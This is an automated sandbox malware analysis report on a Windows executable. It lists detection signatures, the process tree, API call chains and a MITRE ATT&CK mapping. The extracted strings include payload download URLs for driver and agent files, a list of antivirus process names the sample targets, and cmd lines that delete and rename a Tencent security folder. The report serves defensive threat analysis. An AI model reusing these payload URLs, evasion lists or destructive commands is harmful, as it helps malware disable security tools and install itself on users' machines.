Edit tour

Windows Analysis Report
dinhVFAbgo

Overview

General Information

Sample Name:	dinhVFAbgo (renamed file extension from none to exe)
Analysis ID:	626617
MD5:	de3eafb5fa64237cb2d54949c432f19c
SHA1:	bbb3d8d70e1416241b469c3f58596986957ac39d
SHA256:	93d2edbc498f6f8689223bcb079143a97627efe9c1f7b23687a94a1eaf223d78
Tags:	32exe
Infos:

Detection

Score:	56
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Multi AV Scanner detection for submitted file

Found evasive API chain (may stop execution after checking mutex)

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Uses 32bit PE files

Found decision node followed by non-executed suspicious APIs

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to query locales information (e.g. system language)

Uses code obfuscation techniques (call, push, ret)

Tries to connect to HTTP servers, but all servers are down (expired dropper behavior)

Detected potential crypto function

Contains functionality to create guard pages, often used to hinder reverse engineering and debugging

Found potential string decryption / allocating functions

Sample execution stops while process was sleeping (likely an evasion)

Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)

Contains functionality to communicate with device drivers

Contains functionality to check if a window is minimized (may be used to check if an application is visible)

Contains functionality to dynamically determine API calls

AV process strings found (often used to terminate AV products)

Contains functionality to read the PEB

Potential key logger detected (key state polling based)

Contains functionality to retrieve information about pressed keystrokes

Found large amount of non-executed APIs

Contains functionality to delete services

Creates a process in suspended mode (likely to inject code)

Contains functionality for read data from the clipboard

Classification

Process Tree

System is w10x64

dinhVFAbgo.exe (PID: 6440 cmdline: "C:\Users\user\Desktop\dinhVFAbgo.exe" MD5: DE3EAFB5FA64237CB2D54949C432F19C)

cmd.exe (PID: 6460 cmdline: C:\Windows\system32\cmd.exe /c md C:\DownLoad-Helper MD5: F3BDBE3BB6F734E357235F4D5898582D)

conhost.exe (PID: 6472 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

cleanup

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Multi AV Scanner detection for submitted file

Source: dinhVFAbgo.exe

Virustotal: Detection: 10%

Perma Link

Source: dinhVFAbgo.exe

Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE

Source: dinhVFAbgo.exe

Static PE information: TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT

Source: C:\Users\user\Desktop\dinhVFAbgo.exe

Code function: 0_2_00CAC295 __EH_prolog3_GS,GetFullPathNameA,__cftof,_strlen,PathIsUNCA,GetVolumeInformationA,CharUpperA,FindFirstFileA,FindClose,_strlen,_strlen,

0_2_00CAC295

Source: global traffic

TCP traffic: 192.168.2.3:49735 -> 59.110.190.41:80

Source: dinhVFAbgo.exe	String found in binary or memory: https://wtyjqpaszl-torjan.oss-cn-beijing.aliyuncs.com/TorJanFile/ProtectDriver/x64_Defender.dat
Source: dinhVFAbgo.exe	String found in binary or memory: https://wtyjqpaszl-torjan.oss-cn-beijing.aliyuncs.com/TorJanFile/ProtectDriver/x64_FsFilter.dat
Source: dinhVFAbgo.exe	String found in binary or memory: https://wtyjqpaszl-torjan.oss-cn-beijing.aliyuncs.com/TorJanFile/SHA128Driver/x64_Defender.dat
Source: dinhVFAbgo.exe	String found in binary or memory: https://wtyjqpaszl-torjan.oss-cn-beijing.aliyuncs.com/TorJanFile/SHA128Driver/x64_Defender.dathttps:
Source: dinhVFAbgo.exe	String found in binary or memory: https://wtyjqpaszl-torjan.oss-cn-beijing.aliyuncs.com/TorJanFile/SHA128Driver/x64_FsFilter.dat
Source: dinhVFAbgo.exe	String found in binary or memory: https://wtyjqpaszl-torjan.oss-cn-beijing.aliyuncs.com/TorJanFile/UpdateInit/Agent.exe
Source: dinhVFAbgo.exe	String found in binary or memory: https://wtyjqpaszl-torjan.oss-cn-beijing.aliyuncs.com/TorJanFile/UpdateInit/Update.ini
Source: dinhVFAbgo.exe	String found in binary or memory: https://wtyjqpaszl-torjan.oss-cn-beijing.aliyuncs.com/TorJanFile/UpdateInit/Update.inihttps://wtyjqp

Source: unknown

DNS traffic detected: queries for: wtyjqpaszl-torjan.oss-cn-beijing.aliyuncs.com

Source: C:\Users\user\Desktop\dinhVFAbgo.exe

Code function: 0_2_00CA79A0 recv,

0_2_00CA79A0

Source: C:\Users\user\Desktop\dinhVFAbgo.exe	Code function: 0_2_00D09483 __EH_prolog3_GS,GetKeyState,GetKeyState,GetKeyState,GetParent,SendMessageA,ScreenToClient,GetCursorPos,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SetWindowPos,SendMessageA,SendMessageA,GetParent,	0_2_00D09483
Source: C:\Users\user\Desktop\dinhVFAbgo.exe	Code function: 0_2_00CB3981 GetKeyState,GetKeyState,GetKeyState,SendMessageA,	0_2_00CB3981
Source: C:\Users\user\Desktop\dinhVFAbgo.exe	Code function: 0_2_00CCBE54 SendMessageA,GetKeyState,SendMessageA,SendMessageA,SendMessageA,GetKeyState,SendMessageA,SendMessageA,GetKeyState,GetKeyState,GetKeyState,SendMessageA,GetKeyState,SendMessageA,GetKeyState,SendMessageA,SendMessageA,MessageBeep,	0_2_00CCBE54

Source: C:\Users\user\Desktop\dinhVFAbgo.exe

Code function: 0_2_00D2428E GetKeyboardState,GetKeyboardLayout,MapVirtualKeyA,ToAsciiEx,LoadAcceleratorsW,LoadAcceleratorsW,

0_2_00D2428E

Source: C:\Users\user\Desktop\dinhVFAbgo.exe

Code function: 0_2_00D7A59D __EH_prolog3_catch_GS,CreateCompatibleDC,CreateCompatibleBitmap,FillRect,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,

0_2_00D7A59D

Source: dinhVFAbgo.exe

Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE

Source: C:\Users\user\Desktop\dinhVFAbgo.exe	Code function: 0_2_00CB406F	0_2_00CB406F
Source: C:\Users\user\Desktop\dinhVFAbgo.exe	Code function: 0_2_00DE406E	0_2_00DE406E
Source: C:\Users\user\Desktop\dinhVFAbgo.exe	Code function: 0_2_00DE42A0	0_2_00DE42A0
Source: C:\Users\user\Desktop\dinhVFAbgo.exe	Code function: 0_2_00DE44D2	0_2_00DE44D2
Source: C:\Users\user\Desktop\dinhVFAbgo.exe	Code function: 0_2_00DE8A9A	0_2_00DE8A9A
Source: C:\Users\user\Desktop\dinhVFAbgo.exe	Code function: 0_2_00DEAA00	0_2_00DEAA00
Source: C:\Users\user\Desktop\dinhVFAbgo.exe	Code function: 0_2_00DE0D40	0_2_00DE0D40
Source: C:\Users\user\Desktop\dinhVFAbgo.exe	Code function: 0_2_00E0303E	0_2_00E0303E
Source: C:\Users\user\Desktop\dinhVFAbgo.exe	Code function: 0_2_00D0D1DF	0_2_00D0D1DF
Source: C:\Users\user\Desktop\dinhVFAbgo.exe	Code function: 0_2_00CD313E	0_2_00CD313E
Source: C:\Users\user\Desktop\dinhVFAbgo.exe	Code function: 0_2_00E0532A	0_2_00E0532A
Source: C:\Users\user\Desktop\dinhVFAbgo.exe	Code function: 0_2_00E01317	0_2_00E01317
Source: C:\Users\user\Desktop\dinhVFAbgo.exe	Code function: 0_2_00E0544A	0_2_00E0544A

Source: C:\Users\user\Desktop\dinhVFAbgo.exe	Code function: String function: 00DDD55F appears 124 times
Source: C:\Users\user\Desktop\dinhVFAbgo.exe	Code function: String function: 00DDD52C appears 296 times
Source: C:\Users\user\Desktop\dinhVFAbgo.exe	Code function: String function: 00CA6953 appears 34 times
Source: C:\Users\user\Desktop\dinhVFAbgo.exe	Code function: String function: 00DDCEDD appears 65 times
Source: C:\Users\user\Desktop\dinhVFAbgo.exe	Code function: String function: 00DDD690 appears 66 times
Source: C:\Users\user\Desktop\dinhVFAbgo.exe	Code function: String function: 00CACA43 appears 44 times

Source: C:\Users\user\Desktop\dinhVFAbgo.exe

Code function: 0_2_00CA6BF1: DeviceIoControl,

0_2_00CA6BF1

Source: C:\Users\user\Desktop\dinhVFAbgo.exe

Code function: 0_2_00CA6AF3 OpenSCManagerA,OpenServiceA,GetLastError,DeleteService,ControlService,GetLastError,StartServiceA,CreateServiceA,GetLastError,CloseServiceHandle,CloseServiceHandle,

0_2_00CA6AF3

Source: dinhVFAbgo.exe

Virustotal: Detection: 10%

Source: dinhVFAbgo.exe

Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\Desktop\dinhVFAbgo.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\dinhVFAbgo.exe "C:\Users\user\Desktop\dinhVFAbgo.exe"
Source: C:\Users\user\Desktop\dinhVFAbgo.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c md C:\DownLoad-Helper
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\dinhVFAbgo.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c md C:\DownLoad-Helper	Jump to behavior

Source: C:\Users\user\Desktop\dinhVFAbgo.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{DCB00C01-570F-4A9B-8D69-199FDBA5723B}\InProcServer32

Jump to behavior

Source: classification engine

Classification label: mal56.evad.winEXE@4/0@6/1

Source: C:\Users\user\Desktop\dinhVFAbgo.exe

Code function: 0_2_00CA5D23 CoInitialize,CoCreateInstance,CoUninitialize,

0_2_00CA5D23

Source: C:\Users\user\Desktop\dinhVFAbgo.exe	Code function: OpenSCManagerA,OpenServiceA,GetLastError,DeleteService,ControlService,GetLastError,StartServiceA,CreateServiceA,GetLastError,CloseServiceHandle,CloseServiceHandle,		0_2_00CA6AF3
Source: C:\Users\user\Desktop\dinhVFAbgo.exe	Code function: GetFullPathNameA,OpenSCManagerA,CloseServiceHandle,CreateServiceA,GetLastError,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,RegCreateKeyExA,RegSetValueExA,RegFlushKey,RegCloseKey,RegCreateKeyExA,RegSetValueExA,RegSetValueExA,RegSetValueExA,RegFlushKey,RegCloseKey,		0_2_00CA8C59

Source: C:\Users\user\Desktop\dinhVFAbgo.exe

File read: C:\DownLoad-Helper\Update.ini

Jump to behavior

Source: C:\Users\user\Desktop\dinhVFAbgo.exe

Code function: 0_2_00CA6AF3 OpenSCManagerA,OpenServiceA,GetLastError,DeleteService,ControlService,GetLastError,StartServiceA,CreateServiceA,GetLastError,CloseServiceHandle,CloseServiceHandle,

0_2_00CA6AF3

Source: C:\Users\user\Desktop\dinhVFAbgo.exe

Code function: 0_2_00CA863A CreateToolhelp32Snapshot,Thread32First,CloseHandle,CloseHandle,OpenThread,OpenProcess,GetMappedFileNameA,TerminateThread,CloseHandle,CloseHandle,Thread32Next,CloseHandle,GetLastError,CloseHandle,SetLastError,CloseHandle,

0_2_00CA863A

Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6472:120:WilError_01
Source: C:\Users\user\Desktop\dinhVFAbgo.exe	Mutant created: \Sessions\1\BaseNamedObjects\services.exe

Source: C:\Users\user\Desktop\dinhVFAbgo.exe

Code function: 0_2_00CB2712 FindResourceA,LoadResource,LockResource,

0_2_00CB2712

Source: dinhVFAbgo.exe	String found in binary or memory: C:\DownLoad-Helper\services.exe
Source: dinhVFAbgo.exe	String found in binary or memory: C:\DownLoad-Helper\x64_FsFilter.sys
Source: dinhVFAbgo.exe	String found in binary or memory: C:\DownLoad-Helper\x64_Defender.dat
Source: dinhVFAbgo.exe	String found in binary or memory: C:\DownLoad-Helper\x64_Defender.sys
Source: dinhVFAbgo.exe	String found in binary or memory: C:\DownLoad-Helper\x64_FsFilter.dat
Source: dinhVFAbgo.exe	String found in binary or memory: md C:\DownLoad-Helper
Source: dinhVFAbgo.exe	String found in binary or memory: C:\DownLoad-Helper\servicesDecode.exe
Source: dinhVFAbgo.exe	String found in binary or memory: C:\DownLoad-Helper\svchost.dat
Source: dinhVFAbgo.exe	String found in binary or memory: C:\DownLoad-Helper\svchost.exe
Source: dinhVFAbgo.exe	String found in binary or memory: C:\DownLoad-Helper
Source: dinhVFAbgo.exe	String found in binary or memory: C:\DownLoad-Helper\svchost.exe
Source: dinhVFAbgo.exe	String found in binary or memory: C:\DownLoad-Helper\svchost.dat
Source: dinhVFAbgo.exe	String found in binary or memory: C:\DownLoad-Helper
Source: dinhVFAbgo.exe	String found in binary or memory: Cannot get trigger collection: %xTrigger1C:\DownLoad-Helper\svchost.exeC:\DownLoad-Helper\svchost.dat: iostreambad castbad locale nameios_base::badbit setios_base::failbit setios_base::eofbit set
Source: dinhVFAbgo.exe	String found in binary or memory: iostream stream error/NOC:\DownLoad-Helper\Agent.exeContent-Length\Update.inihttps://wtyjqpaszl-torjan.oss-cn-beijing.aliyuncs.com/TorJanFile/UpdateInit/Update.inihttps://wtyjqpaszl-torjan.oss-cn-beijing.aliyuncs.com/TorJanFile/UpdateInit/Agent.exe\Updater.ini\x64_FsFilter.dat\x64_Defender.datwbx64_FsFilter.datx64_Defender.datMicrosoft Windows 7C:\DownLoad - Helper\x64_Defender.datC:\DownLoad - Helper\x64_FsFilter.dathttps://wtyjqpaszl-torjan.oss-cn-beijing.aliyuncs.com/TorJanFile/SHA128Driver/x64_Defender.dathttps://wtyjqpaszl-torjan.oss-cn-beijing.aliyuncs.com/TorJanFile/SHA128Driver/x64_FsFilter.dathttps://wtyjqpaszl-torjan.oss-cn-beijing.aliyuncs.com/TorJanFile/ProtectDriver/x64_Defender.dathttps://wtyjqpaszl-torjan.oss-cn-beijing.aliyuncs.com/TorJanFile/ProtectDriver/x64_FsFilter.datmainverMAINVERUpdate.iniUpdater.iniopen\\.\x64_DefenderLinksWindows
Source: dinhVFAbgo.exe	String found in binary or memory: C:\DownLoad-Helper\services.exe
Source: dinhVFAbgo.exe	String found in binary or memory: C:\DownLoad-Helper\services.exeiniurlINIURLrestartRESTARTYESGetNativeSystemInfokernel32unknown OperatingSystem.Microsoft Windows NT 4.0Microsoft Windows 95Microsoft Windows 98Microsoft Windows MeMicrosoft Windows 2000Microsoft Windows XPMicrosoft Windows XP Professional x64 EditionMicrosoft Windows Server 2003Microsoft Windows Server 2003 R2Microsoft Windows VistaMicrosoft Windows Server 2008Microsoft Windows Server 2008 R2NetPCI%s
Source: dinhVFAbgo.exe	String found in binary or memory: C:\DownLoad-Helper\x64_Defender.sys
Source: dinhVFAbgo.exe	String found in binary or memory: C:\DownLoad-Helper\x64_Defender.dat
Source: dinhVFAbgo.exe	String found in binary or memory: C:\DownLoad-Helper\x64_FsFilter.sys
Source: dinhVFAbgo.exe	String found in binary or memory: C:\DownLoad-Helper\x64_FsFilter.dat
Source: dinhVFAbgo.exe	String found in binary or memory: u@CC:\DownLoad-Helper\x64_Defender.sysx64_DefenderC:\DownLoad-Helper\x64_Defender.datC:\DownLoad-Helper\x64_FsFilter.sysFsFilterC:\DownLoad-Helper\x64_FsFilter.dat370030InitializeLoadDriver_NewVersion64360rp.exe360tray.exe360sd.exeZhuDongFangYu.exeQQPCRTP.exeQQPCTray.exekxetray.exekwsprotect64.exeG2345SafeTray.exe2345SafeSvc.exe360Tray.exeknewvip.exekxescore.exekxecenter.exekxemain.exeHipsTray.exeHipsDaemon.exe2345MPCSafe.exeLenovoPcManagerService.exeLAVService.exeLenovoTray.exe360{C3C4746B-4B9D-4694-90A0-3323295ED085}360Safe.exe
Source: dinhVFAbgo.exe	String found in binary or memory: md C:\DownLoad-Helper
Source: dinhVFAbgo.exe	String found in binary or memory: C:\DownLoad-Helper\servicesDecode.exe
Source: dinhVFAbgo.exe	String found in binary or memory: Q360SafeMainClass360safemonpro.tpiservices.exemd C:\DownLoad-HelperKERNEL32.dllWinExeccmd /c ren C:\"Program Files (x86)"\"Common Files"\Tencent\QQProtect\sonfig Bincmd /c rmdir /s /q C:\"Program Files (x86)"\"Common Files"\Tencent\QQProtect\Bincmd /c del C:\jc.txtC:\DownLoad-Helper\servicesDecode.exe.ACPntdllZwQueryInformationThread

Source: C:\Users\user\Desktop\dinhVFAbgo.exe	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior
Source: C:\Users\user\Desktop\dinhVFAbgo.exe	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior

Source: dinhVFAbgo.exe

Static PE information: Virtual size of .text is bigger than: 0x100000

Source: dinhVFAbgo.exe

Static file information: File size 2117120 > 1048576

Source: dinhVFAbgo.exe

Static PE information: Raw size of .text is bigger than: 0x100000 < 0x175200

Source: dinhVFAbgo.exe

Static PE information: More than 200 imports for USER32.dll

Source: dinhVFAbgo.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: dinhVFAbgo.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: dinhVFAbgo.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: dinhVFAbgo.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: dinhVFAbgo.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: dinhVFAbgo.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT

Source: dinhVFAbgo.exe

Static PE information: TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT

Source: dinhVFAbgo.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Source: dinhVFAbgo.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: dinhVFAbgo.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: dinhVFAbgo.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: dinhVFAbgo.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: dinhVFAbgo.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

Source: C:\Users\user\Desktop\dinhVFAbgo.exe	Code function: 0_2_00CDED98 pushfd ; ret		0_2_00CDED99
Source: C:\Users\user\Desktop\dinhVFAbgo.exe	Code function: 0_2_00DDD4FA push ecx; ret		0_2_00DDD50D

Source: C:\Users\user\Desktop\dinhVFAbgo.exe

Code function: 0_2_00CA8A72 GetConsoleWindow,GetSystemMenu,EnableMenuItem,CreateMutexA,GetLastError,CreateThread,WaitForSingleObject,LoadLibraryA,GetProcAddress,DeleteFileA,Sleep,Sleep,Sleep,Sleep,CreateThread,CreateThread,CreateThread,CreateThread,GetModuleHandleA,GetProcAddress,CreateThread,CloseHandle,Sleep,CloseHandle,

0_2_00CA8A72

Source: C:\Users\user\Desktop\dinhVFAbgo.exe

Code function: 0_2_00CA5FC9 __EH_prolog3_GS,Sleep,GetPrivateProfileStringA,GetPrivateProfileStringA,GetPrivateProfileStringA,GetPrivateProfileStringA,Sleep,GetPrivateProfileStringA,GetPrivateProfileStringA,GetPrivateProfileStringA,Sleep,GetPrivateProfileStringA,WritePrivateProfileStringA,DeleteFileA,ShellExecuteA,Sleep,ExitProcess,

0_2_00CA5FC9

Source: C:\Users\user\Desktop\dinhVFAbgo.exe

Code function: 0_2_00CA6AF3 OpenSCManagerA,OpenServiceA,GetLastError,DeleteService,ControlService,GetLastError,StartServiceA,CreateServiceA,GetLastError,CloseServiceHandle,CloseServiceHandle,

0_2_00CA6AF3

Source: C:\Users\user\Desktop\dinhVFAbgo.exe	Code function: 0_2_00D06FDD GetParent,IsIconic,GetParent,GetDlgCtrlID,		0_2_00D06FDD
Source: C:\Users\user\Desktop\dinhVFAbgo.exe	Code function: 0_2_00CF4F06 SetRectEmpty,RedrawWindow,ReleaseCapture,SetCapture,ReleaseCapture,SetCapture,SendMessageA,UpdateWindow,SendMessageA,IsWindow,IsIconic,IsZoomed,IsWindow,UpdateWindow,		0_2_00CF4F06

Malware Analysis System Evasion

Found evasive API chain (may stop execution after checking mutex)

Source: C:\Users\user\Desktop\dinhVFAbgo.exe

Evasive API call chain: CreateMutex,DecisionNodes,Sleep

graph_0-68786

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Source: dinhVFAbgo.exe	Binary or memory string: HRAUTORUNSAUTORUNS.EXEHIPSMAIN.EXE2345
Source: dinhVFAbgo.exe	Binary or memory string: AUTORUNS.EXE

Source: C:\Users\user\Desktop\dinhVFAbgo.exe

Decision node followed by non-executed suspicious API: DecisionNode, Non Executed (send or recv or WinExec)

graph_0-69140

Source: C:\Windows\System32\conhost.exe

Last function: Thread delayed

Source: C:\Users\user\Desktop\dinhVFAbgo.exe

API coverage: 3.7 %

Source: C:\Users\user\Desktop\dinhVFAbgo.exe

Code function: 0_2_00DE237B VirtualQuery,GetSystemInfo,VirtualAlloc,VirtualProtect,

0_2_00DE237B

Source: C:\Users\user\Desktop\dinhVFAbgo.exe

Code function: 0_2_00CAC295 __EH_prolog3_GS,GetFullPathNameA,__cftof,_strlen,PathIsUNCA,GetVolumeInformationA,CharUpperA,FindFirstFileA,FindClose,_strlen,_strlen,

0_2_00CAC295

Source: C:\Users\user\Desktop\dinhVFAbgo.exe

API call chain: ExitProcess graph end node

graph_0-68910

Source: C:\Users\user\Desktop\dinhVFAbgo.exe

Code function: 0_2_00DE216E IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,

0_2_00DE216E

Source: C:\Users\user\Desktop\dinhVFAbgo.exe

Code function: 0_2_00DE237B VirtualProtect ?,-00000001,00000104,?,?,?,00000000

0_2_00DE237B

Source: C:\Users\user\Desktop\dinhVFAbgo.exe

Code function: 0_2_00CAB4CE OutputDebugStringA,GetLastError,

0_2_00CAB4CE

Source: C:\Users\user\Desktop\dinhVFAbgo.exe

0_2_00CA8A72

Source: C:\Users\user\Desktop\dinhVFAbgo.exe	Code function: 0_2_00DF998E mov eax, dword ptr fs:[00000030h]		0_2_00DF998E
Source: C:\Users\user\Desktop\dinhVFAbgo.exe	Code function: 0_2_00DEB924 mov eax, dword ptr fs:[00000030h]		0_2_00DEB924

Source: C:\Users\user\Desktop\dinhVFAbgo.exe	Code function: 0_2_00DE216E IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,		0_2_00DE216E
Source: C:\Users\user\Desktop\dinhVFAbgo.exe	Code function: 0_2_00DDCF23 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,		0_2_00DDCF23

Source: C:\Users\user\Desktop\dinhVFAbgo.exe

Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c md C:\DownLoad-Helper

Jump to behavior

Source: C:\Users\user\Desktop\dinhVFAbgo.exe

Code function: 0_2_00CA889D ImpersonateSelf,GetCurrentThread,OpenThreadToken,GetLastError,GetCurrentProcess,GetCurrentProcess,OpenProcessToken,OpenProcessToken,GetCurrentProcess,OpenProcessToken,AllocateAndInitializeSid,LocalAlloc,LocalAlloc,InitializeSecurityDescriptor,GetLengthSid,LocalAlloc,InitializeAcl,AddAccessAllowedAce,SetSecurityDescriptorDacl,SetSecurityDescriptorGroup,SetSecurityDescriptorOwner,IsValidSecurityDescriptor,AccessCheck,RevertToSelf,LocalFree,LocalFree,FreeSid,

0_2_00CA889D

Source: C:\Users\user\Desktop\dinhVFAbgo.exe

0_2_00CA889D

Source: C:\Users\user\Desktop\dinhVFAbgo.exe	Code function: EnumSystemLocalesW,	0_2_00E00086
Source: C:\Users\user\Desktop\dinhVFAbgo.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,	0_2_00E00111
Source: C:\Users\user\Desktop\dinhVFAbgo.exe	Code function: GetLocaleInfoW,	0_2_00E00364
Source: C:\Users\user\Desktop\dinhVFAbgo.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP,	0_2_00E0048A
Source: C:\Users\user\Desktop\dinhVFAbgo.exe	Code function: GetLocaleInfoW,	0_2_00E00590
Source: C:\Users\user\Desktop\dinhVFAbgo.exe	Code function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,	0_2_00E0065F
Source: C:\Users\user\Desktop\dinhVFAbgo.exe	Code function: EnumSystemLocalesW,	0_2_00DF4D9C
Source: C:\Users\user\Desktop\dinhVFAbgo.exe	Code function: GetLocaleInfoW,	0_2_00DF52FE
Source: C:\Users\user\Desktop\dinhVFAbgo.exe	Code function: GetACP,IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW,	0_2_00DFFCFE
Source: C:\Users\user\Desktop\dinhVFAbgo.exe	Code function: GetLocaleInfoW,	0_2_00DFFEF9
Source: C:\Users\user\Desktop\dinhVFAbgo.exe	Code function: EnumSystemLocalesW,	0_2_00DFFFEB
Source: C:\Users\user\Desktop\dinhVFAbgo.exe	Code function: EnumSystemLocalesW,	0_2_00DFFFA0

Source: C:\Users\user\Desktop\dinhVFAbgo.exe

Code function: 0_2_00DEB4A8 GetSystemTimeAsFileTime,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,

0_2_00DEB4A8

Source: C:\Users\user\Desktop\dinhVFAbgo.exe

Code function: 0_2_00CA6C70 GetSystemInfo,GetVersionExA,GetSystemMetrics,GetSystemMetrics,

0_2_00CA6C70

Source: dinhVFAbgo.exe, dinhVFAbgo.exe, 00000000.00000000.238756247.0000000000E17000.00000002.00000001.01000000.00000003.sdmp, dinhVFAbgo.exe, 00000000.00000002.507292603.0000000000E17000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: kxetray.exe
Source: dinhVFAbgo.exe, dinhVFAbgo.exe, 00000000.00000000.238756247.0000000000E17000.00000002.00000001.01000000.00000003.sdmp, dinhVFAbgo.exe, 00000000.00000002.507292603.0000000000E17000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: Autoruns.exe
Source: dinhVFAbgo.exe, dinhVFAbgo.exe, 00000000.00000000.238756247.0000000000E17000.00000002.00000001.01000000.00000003.sdmp, dinhVFAbgo.exe, 00000000.00000002.507292603.0000000000E17000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: 360Safe.exe
Source: dinhVFAbgo.exe, dinhVFAbgo.exe, 00000000.00000000.238756247.0000000000E17000.00000002.00000001.01000000.00000003.sdmp, dinhVFAbgo.exe, 00000000.00000002.507292603.0000000000E17000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: 360tray.exe
Source: dinhVFAbgo.exe, dinhVFAbgo.exe, 00000000.00000000.238756247.0000000000E17000.00000002.00000001.01000000.00000003.sdmp, dinhVFAbgo.exe, 00000000.00000002.507292603.0000000000E17000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: 360Tray.exe

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts	2 Command and Scripting Interpreter	12 Windows Service	12 Windows Service	1 Disable or Modify Tools	21 Input Capture	1 System Time Discovery	Remote Services	21 Input Capture	Exfiltration Over Other Network Medium	1 Encrypted Channel	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	Modify System Partition
Default Accounts	12 Service Execution	Boot or Logon Initialization Scripts	11 Process Injection	11 Process Injection	LSASS Memory	13 Security Software Discovery	Remote Desktop Protocol	1 Archive Collected Data	Exfiltration Over Bluetooth	1 Ingress Tool Transfer	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	11 Native API	Logon Script (Windows)	Logon Script (Windows)	1 Deobfuscate/Decode Files or Information	Security Account Manager	1 Process Discovery	SMB/Windows Admin Shares	1 Clipboard Data	Automated Exfiltration	1 Non-Application Layer Protocol	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	At (Windows)	Logon Script (Mac)	Logon Script (Mac)	2 Obfuscated Files or Information	NTDS	1 Application Window Discovery	Distributed Component Object Model	Input Capture	Scheduled Transfer	1 Application Layer Protocol	SIM Card Swap		Carrier Billing Fraud
Cloud Accounts	Cron	Network Logon Script	Network Logon Script	Software Packing	LSA Secrets	1 Remote System Discovery	SSH	Keylogging	Data Transfer Size Limits	Fallback Channels	Manipulate Device Communication		Manipulate App Store Rankings or Ratings
Replication Through Removable Media	Launchd	Rc.common	Rc.common	Steganography	Cached Domain Credentials	2 File and Directory Discovery	VNC	GUI Input Capture	Exfiltration Over C2 Channel	Multiband Communication	Jamming or Denial of Service		Abuse Accessibility Features
External Remote Services	Scheduled Task	Startup Items	Startup Items	Compile After Delivery	DCSync	14 System Information Discovery	Windows Remote Management	Web Portal Capture	Exfiltration Over Alternative Protocol	Commonly Used Port	Rogue Wi-Fi Access Points		Data Encrypted for Impact

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
dinhVFAbgo.exe	10%	Virustotal		Browse
dinhVFAbgo.exe	5%	ReversingLabs

Dropped Files

